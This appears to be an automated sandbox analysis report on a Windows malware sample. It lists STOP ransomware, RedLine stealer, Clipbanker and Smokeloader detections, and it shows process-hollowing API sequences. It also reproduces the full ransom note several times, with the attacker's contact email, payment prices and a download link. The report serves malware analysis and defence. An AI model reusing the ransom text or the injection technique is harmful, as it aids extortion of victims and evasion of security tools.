Source: C:\Users\user\AppData\Local\Temp\1601.exe	File dropped: C:\$WinREAgent\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/df01994dd8d37c2c33469922f8e7155a20240402134014/fd95b0price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1601.exe	File dropped: C:\$WinREAgent\Scratch\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/df01994dd8d37c2c33469922f8e7155a20240402134014/fd95b0price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	File dropped: C:\Users\user\_README.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/df01994dd8d37c2c33469922f8e7155a20240402134014/fd95b0price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 25.2.build3.exe.9215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 25.2.build3.exe.9215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 33.2.mstsca.exe.9215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 33.2.mstsca.exe.9215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 25.2.build3.exe.9215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 25.2.build3.exe.9215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 30.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 33.2.mstsca.exe.9215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 33.2.mstsca.exe.9215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 30.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 13.2.1601.exe.48e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.1601.exe.48e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.1601.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.1601.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.1601.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.1601.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.1601.exe.49515a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.1601.exe.49515a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.1601.exe.49615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.2.1601.exe.49615a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 34.2.1601.exe.48c15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 34.2.1601.exe.48c15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 38.2.1601.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 38.2.1601.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.2.1601.exe.48d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.2.1601.exe.48d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 13.2.1601.exe.48e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.1601.exe.48e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 29.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 29.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.1601.exe.49615a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.2.1601.exe.49615a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 34.2.1601.exe.48c15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 34.2.1601.exe.48c15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 29.2.1601.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 29.2.1601.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.1601.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.1601.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.1601.exe.49515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.1601.exe.49515a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 28.2.1601.exe.48d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 28.2.1601.exe.48d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 38.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 38.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.1601.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000000.00000002.1443372000.0000000002F58000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000021.00000002.2169316738.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000021.00000002.2169316738.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000021.00000002.2170422232.0000000000A0C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000022.00000002.1999924732.0000000004827000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000F.00000002.1764359339.0000000004960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000002.2618390493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000002.2618390493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000000.00000002.1443176232.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000012.00000002.1803546688.0000000000AD1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000002.1720687002.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000008.00000002.1720633921.00000000048B5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001D.00000002.1908200687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001D.00000002.1908200687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000000.00000002.1443196159.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000F.00000002.1764276371.00000000048C1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001C.00000002.1898227455.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000026.00000002.2012212178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000026.00000002.2012212178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000001E.00000002.1943856985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001E.00000002.1943856985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000D.00000002.1771744600.00000000048E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000001C.00000002.1897883269.000000000482F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.1682340416.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000010.00000002.2618108080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000002.2618108080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000000.00000002.1443235226.0000000002D21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.1682396136.0000000002D21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000D.00000002.1771122614.0000000002E89000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000019.00000002.1943356920.0000000000A3D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.1682669185.0000000002ED8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000019.00000002.1942895052.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000019.00000002.1942895052.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000004.00000002.1682358139.0000000002D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000022.00000002.2000374378.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000002.1747434458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: Process Memory Space: 1601.exe PID: 8176, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 1601.exe PID: 5136, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 1601.exe PID: 7472, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 1601.exe PID: 7536, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 1601.exe PID: 3944, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 1601.exe PID: 7496, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 1601.exe PID: 3108, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 1601.exe PID: 3952, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 1601.exe PID: 5068, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 1601.exe PID: 6044, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown

PE file contains section with special chars

Source: 455F.exe.2.dr	Static PE information: section name: .vmp{
Source: 455F.exe.2.dr	Static PE information: section name: .vmp{
Source: 455F.exe.2.dr	Static PE information: section name: .vmp{

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015D5
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_00401603 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401603
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_0040161A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040161A
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_004026D2 NtOpenKey,	0_2_004026D2
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_00402745 NtEnumerateKey,	0_2_00402745
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_00402348 NtQuerySystemInformation,NtQuerySystemInformation,	0_2_00402348
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040156B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_00402770 NtEnumerateKey,	0_2_00402770
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_0040217B NtQuerySystemInformation,NtQuerySystemInformation,EntryPoint,	0_2_0040217B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_0040217D NtQuerySystemInformation,NtQuerySystemInformation,EntryPoint,	0_2_0040217D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_004021CB NtQuerySystemInformation,NtQuerySystemInformation,EntryPoint,	0_2_004021CB
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_004017DF NtMapViewOfSection,NtMapViewOfSection,	0_2_004017DF
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_004015F1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015F1
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_004015F5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015F5
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_004015F8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004015F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_00402188 NtQuerySystemInformation,NtQuerySystemInformation,EntryPoint,	0_2_00402188
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_004027A0 NtClose,	0_2_004027A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_004021A1 NtQuerySystemInformation,NtQuerySystemInformation,EntryPoint,	0_2_004021A1
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Code function: 0_2_004021BB NtQuerySystemInformation,NtQuerySystemInformation,EntryPoint,	0_2_004021BB
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015D5
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_00401603 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401603
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_0040161A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_0040161A
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_004026D2 NtOpenKey,	4_2_004026D2
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_00402745 NtEnumerateKey,	4_2_00402745
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_00402348 NtQuerySystemInformation,NtQuerySystemInformation,	4_2_00402348
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_0040156B
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_00402770 NtEnumerateKey,	4_2_00402770
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_0040217B NtQuerySystemInformation,NtQuerySystemInformation,EntryPoint,	4_2_0040217B
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_0040217D NtQuerySystemInformation,NtQuerySystemInformation,EntryPoint,	4_2_0040217D
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_004021CB NtQuerySystemInformation,NtQuerySystemInformation,EntryPoint,	4_2_004021CB
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_004017DF NtMapViewOfSection,NtMapViewOfSection,	4_2_004017DF
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_004015E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015E0
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_004015F1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015F1
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_004015F5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015F5
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_004015F8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004015F8
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_00402188 NtQuerySystemInformation,NtQuerySystemInformation,EntryPoint,	4_2_00402188
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_004027A0 NtClose,	4_2_004027A0
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_004021A1 NtQuerySystemInformation,NtQuerySystemInformation,EntryPoint,	4_2_004021A1
Source: C:\Users\user\AppData\Roaming\fcbhtea	Code function: 4_2_004021BB NtQuerySystemInformation,NtQuerySystemInformation,EntryPoint,	4_2_004021BB
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_04950110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	8_2_04950110
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Code function: 13_2_048E0110 VirtualAlloc,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,	13_2_048E0110

Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_04953520	8_2_04953520
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_04957520	8_2_04957520
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_0499B69F	8_2_0499B69F
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_0495A699	8_2_0495A699
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_0495E6E0	8_2_0495E6E0
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_0495A79A	8_2_0495A79A
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_0497D7F1	8_2_0497D7F1
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_0495C760	8_2_0495C760
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_0495B0B0	8_2_0495B0B0
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_049600D0	8_2_049600D0
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_049530F0	8_2_049530F0
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_049570E0	8_2_049570E0
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_0495B000	8_2_0495B000
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_0496F030	8_2_0496F030
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_0495A026	8_2_0495A026
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_0497D1A4	8_2_0497D1A4
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_04959120	8_2_04959120
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_0499E141	8_2_0499E141
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_049D22C0	8_2_049D22C0
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_04957220	8_2_04957220
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_04957393	8_2_04957393
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_0499E37C	8_2_0499E37C
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_04955DF7	8_2_04955DF7
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_04955DE7	8_2_04955DE7
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_04992D1E	8_2_04992D1E
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_04984E9F	8_2_04984E9F
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_04958E60	8_2_04958E60
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_04957880	8_2_04957880
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_049718D0	8_2_049718D0
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_0497F9B0	8_2_0497F9B0
Source: C:\Users\user\AppData\Local\Temp\1601.exe	Code function: 8_2_0497E9A3	8_2_0497E9A3
